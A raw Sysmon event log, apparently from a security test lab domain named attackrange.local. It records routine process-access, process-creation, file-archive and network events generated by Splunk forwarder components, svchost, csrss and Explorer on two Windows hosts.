10341000x8000000000000000806676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.285{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001046986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.519{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.519{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.519{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:27.987{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FBA1EB4BF1F308FD281924D535D6E0,SHA256=F474FDA0AEB6023B96A4E5254894C50224E2A0C314940FC34B998AFF60AAD5B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.815{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F1E3AC8F35C2E139BB77252538C303D,SHA256=D179FF0295A2EBDB85651B7B83DEC3F353D72835A6FE9FE1354C6F9D25095153,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.612{0C1E0330-F38F-60EB-5579-00000000D001}25642984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.442{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4FAC2D3FFE40B15414FB1703ED5B5B7,SHA256=D8B22EBD165368CD13593596DD438096339763FA667941DA7E9AE2BA7BFC4F2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57202-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.690{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D0D76B04628D4539434989E6A811FE,SHA256=25CFA8CE3FAEB2F3538CB54029CD23405FB2AF9C650A2F2C3B1DBD848075B50B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 